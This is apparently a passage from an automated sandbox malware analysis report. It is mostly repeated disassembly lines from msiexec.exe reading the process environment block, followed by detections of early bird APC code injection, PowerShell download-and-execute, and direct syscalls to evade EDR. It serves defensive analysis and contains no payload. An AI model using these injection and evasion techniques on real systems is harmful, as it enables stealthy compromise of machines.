          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF172 mov eax, dword ptr fs:[00000030h]10_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22147190 mov eax, dword ptr fs:[00000030h]10_2_22147190
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217019F mov eax, dword ptr fs:[00000030h]10_2_2217019F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217019F mov eax, dword ptr fs:[00000030h]10_2_2217019F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217019F mov eax, dword ptr fs:[00000030h]10_2_2217019F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217019F mov eax, dword ptr fs:[00000030h]10_2_2217019F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AC188 mov eax, dword ptr fs:[00000030h]10_2_221AC188
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AC188 mov eax, dword ptr fs:[00000030h]10_2_221AC188
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22130185 mov eax, dword ptr fs:[00000030h]10_2_22130185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EA197 mov eax, dword ptr fs:[00000030h]10_2_220EA197
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EA197 mov eax, dword ptr fs:[00000030h]10_2_220EA197
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EA197 mov eax, dword ptr fs:[00000030h]10_2_220EA197
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210B1B0 mov eax, dword ptr fs:[00000030h]10_2_2210B1B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A11A4 mov eax, dword ptr fs:[00000030h]10_2_221A11A4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A11A4 mov eax, dword ptr fs:[00000030h]10_2_221A11A4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A11A4 mov eax, dword ptr fs:[00000030h]10_2_221A11A4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A11A4 mov eax, dword ptr fs:[00000030h]10_2_221A11A4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212D1D0 mov eax, dword ptr fs:[00000030h]10_2_2212D1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212D1D0 mov ecx, dword ptr fs:[00000030h]10_2_2212D1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E1D0 mov eax, dword ptr fs:[00000030h]10_2_2216E1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E1D0 mov eax, dword ptr fs:[00000030h]10_2_2216E1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E1D0 mov ecx, dword ptr fs:[00000030h]10_2_2216E1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E1D0 mov eax, dword ptr fs:[00000030h]10_2_2216E1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E1D0 mov eax, dword ptr fs:[00000030h]10_2_2216E1D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C51CB mov eax, dword ptr fs:[00000030h]10_2_221C51CB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B61C3 mov eax, dword ptr fs:[00000030h]10_2_221B61C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B61C3 mov eax, dword ptr fs:[00000030h]10_2_221B61C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221971F9 mov esi, dword ptr fs:[00000030h]10_2_221971F9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F51ED mov eax, dword ptr fs:[00000030h]10_2_220F51ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221201F8 mov eax, dword ptr fs:[00000030h]10_2_221201F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C61E5 mov eax, dword ptr fs:[00000030h]10_2_221C61E5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221151EF mov eax, dword ptr fs:[00000030h]10_2_221151EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132619 mov eax, dword ptr fs:[00000030h]10_2_22132619
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212F603 mov eax, dword ptr fs:[00000030h]10_2_2212F603
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22121607 mov eax, dword ptr fs:[00000030h]10_2_22121607
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F3616 mov eax, dword ptr fs:[00000030h]10_2_220F3616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F3616 mov eax, dword ptr fs:[00000030h]10_2_220F3616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210260B mov eax, dword ptr fs:[00000030h]10_2_2210260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E609 mov eax, dword ptr fs:[00000030h]10_2_2216E609
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F262C mov eax, dword ptr fs:[00000030h]10_2_220F262C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]10_2_220EF626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C5636 mov eax, dword ptr fs:[00000030h]10_2_221C5636
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22126620 mov eax, dword ptr fs:[00000030h]10_2_22126620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22128620 mov eax, dword ptr fs:[00000030h]10_2_22128620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210E627 mov eax, dword ptr fs:[00000030h]10_2_2210E627
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210C640 mov eax, dword ptr fs:[00000030h]10_2_2210C640
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22122674 mov eax, dword ptr fs:[00000030h]10_2_22122674
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A660 mov eax, dword ptr fs:[00000030h]10_2_2212A660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A660 mov eax, dword ptr fs:[00000030h]10_2_2212A660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22129660 mov eax, dword ptr fs:[00000030h]10_2_22129660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22129660 mov eax, dword ptr fs:[00000030h]10_2_22129660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B866E mov eax, dword ptr fs:[00000030h]10_2_221B866E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B866E mov eax, dword ptr fs:[00000030h]10_2_221B866E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]10_2_2217368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]10_2_2217368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]10_2_2217368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]10_2_2217368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F4690 mov eax, dword ptr fs:[00000030h]10_2_220F4690
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F4690 mov eax, dword ptr fs:[00000030h]10_2_220F4690
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221266B0 mov eax, dword ptr fs:[00000030h]10_2_221266B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220ED6AA mov eax, dword ptr fs:[00000030h]10_2_220ED6AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220ED6AA mov eax, dword ptr fs:[00000030h]10_2_220ED6AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212C6A6 mov eax, dword ptr fs:[00000030h]10_2_2212C6A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E76B2 mov eax, dword ptr fs:[00000030h]10_2_220E76B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E76B2 mov eax, dword ptr fs:[00000030h]10_2_220E76B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E76B2 mov eax, dword ptr fs:[00000030h]10_2_220E76B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]10_2_220FB6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]10_2_220FB6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]10_2_220FB6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]10_2_220FB6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]10_2_220FB6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]10_2_220FB6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A6C7 mov ebx, dword ptr fs:[00000030h]10_2_2212A6C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212A6C7 mov eax, dword ptr fs:[00000030h]10_2_2212A6C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]10_2_221B16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]10_2_221B16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]10_2_221B16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]10_2_221B16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AF6C7 mov eax, dword ptr fs:[00000030h]10_2_221AF6C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221216CF mov eax, dword ptr fs:[00000030h]10_2_221216CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]10_2_2216E6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]10_2_2216E6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]10_2_2216E6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]10_2_2216E6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221706F1 mov eax, dword ptr fs:[00000030h]10_2_221706F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221706F1 mov eax, dword ptr fs:[00000030h]10_2_221706F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AD6F0 mov eax, dword ptr fs:[00000030h]10_2_221AD6F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211D6E0 mov eax, dword ptr fs:[00000030h]10_2_2211D6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211D6E0 mov eax, dword ptr fs:[00000030h]10_2_2211D6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]10_2_221836EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]10_2_221836EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]10_2_221836EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]10_2_221836EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]10_2_221836EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]10_2_221836EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221236EF mov eax, dword ptr fs:[00000030h]10_2_221236EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22120710 mov eax, dword ptr fs:[00000030h]10_2_22120710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F7703 mov eax, dword ptr fs:[00000030h]10_2_220F7703
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F5702 mov eax, dword ptr fs:[00000030h]10_2_220F5702
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F5702 mov eax, dword ptr fs:[00000030h]10_2_220F5702
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212F71F mov eax, dword ptr fs:[00000030h]10_2_2212F71F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212F71F mov eax, dword ptr fs:[00000030h]10_2_2212F71F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212C700 mov eax, dword ptr fs:[00000030h]10_2_2212C700
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F0710 mov eax, dword ptr fs:[00000030h]10_2_220F0710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]10_2_221CB73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]10_2_221CB73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]10_2_221CB73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]10_2_221CB73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216C730 mov eax, dword ptr fs:[00000030h]10_2_2216C730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22125734 mov eax, dword ptr fs:[00000030h]10_2_22125734
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212273C mov eax, dword ptr fs:[00000030h]10_2_2212273C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212273C mov ecx, dword ptr fs:[00000030h]10_2_2212273C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212273C mov eax, dword ptr fs:[00000030h]10_2_2212273C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F3720 mov eax, dword ptr fs:[00000030h]10_2_220F3720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210F720 mov eax, dword ptr fs:[00000030h]10_2_2210F720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210F720 mov eax, dword ptr fs:[00000030h]10_2_2210F720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210F720 mov eax, dword ptr fs:[00000030h]10_2_2210F720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B972B mov eax, dword ptr fs:[00000030h]10_2_221B972B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212C720 mov eax, dword ptr fs:[00000030h]10_2_2212C720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212C720 mov eax, dword ptr fs:[00000030h]10_2_2212C720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AF72E mov eax, dword ptr fs:[00000030h]10_2_221AF72E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F973A mov eax, dword ptr fs:[00000030h]10_2_220F973A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F973A mov eax, dword ptr fs:[00000030h]10_2_220F973A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E9730 mov eax, dword ptr fs:[00000030h]10_2_220E9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E9730 mov eax, dword ptr fs:[00000030h]10_2_220E9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22174755 mov eax, dword ptr fs:[00000030h]10_2_22174755
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132750 mov eax, dword ptr fs:[00000030h]10_2_22132750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132750 mov eax, dword ptr fs:[00000030h]10_2_22132750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22103740 mov eax, dword ptr fs:[00000030h]10_2_22103740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22103740 mov eax, dword ptr fs:[00000030h]10_2_22103740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22103740 mov eax, dword ptr fs:[00000030h]10_2_22103740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C3749 mov eax, dword ptr fs:[00000030h]10_2_221C3749
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F0750 mov eax, dword ptr fs:[00000030h]10_2_220F0750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212674D mov esi, dword ptr fs:[00000030h]10_2_2212674D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212674D mov eax, dword ptr fs:[00000030h]10_2_2212674D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212674D mov eax, dword ptr fs:[00000030h]10_2_2212674D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]10_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]10_2_220EB765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]10_2_220EB765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]10_2_220EB765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]10_2_220EB765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F8770 mov eax, dword ptr fs:[00000030h]10_2_220F8770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AF78A mov eax, dword ptr fs:[00000030h]10_2_221AF78A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F07AF mov eax, dword ptr fs:[00000030h]10_2_220F07AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211D7B0 mov eax, dword ptr fs:[00000030h]10_2_2211D7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C37B6 mov eax, dword ptr fs:[00000030h]10_2_221C37B6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]10_2_220EF7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217F7AF mov eax, dword ptr fs:[00000030h]10_2_2217F7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2217F7AF mov eax, dword ptr fs:[00000030h]10_2_2217F7AF

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7156.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
